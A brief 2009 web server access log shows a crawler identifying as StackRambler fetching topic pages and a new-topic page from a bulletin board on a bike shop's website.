81.19.66.38 - - [11/Jul/2009:07:40:28 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.0" 200 517 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:07:40:28 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:07:40:29 -0700] "GET /bullitinboard/viewtopic.php?p=2036 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [11/Jul/2009:07:40:32 -0700] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
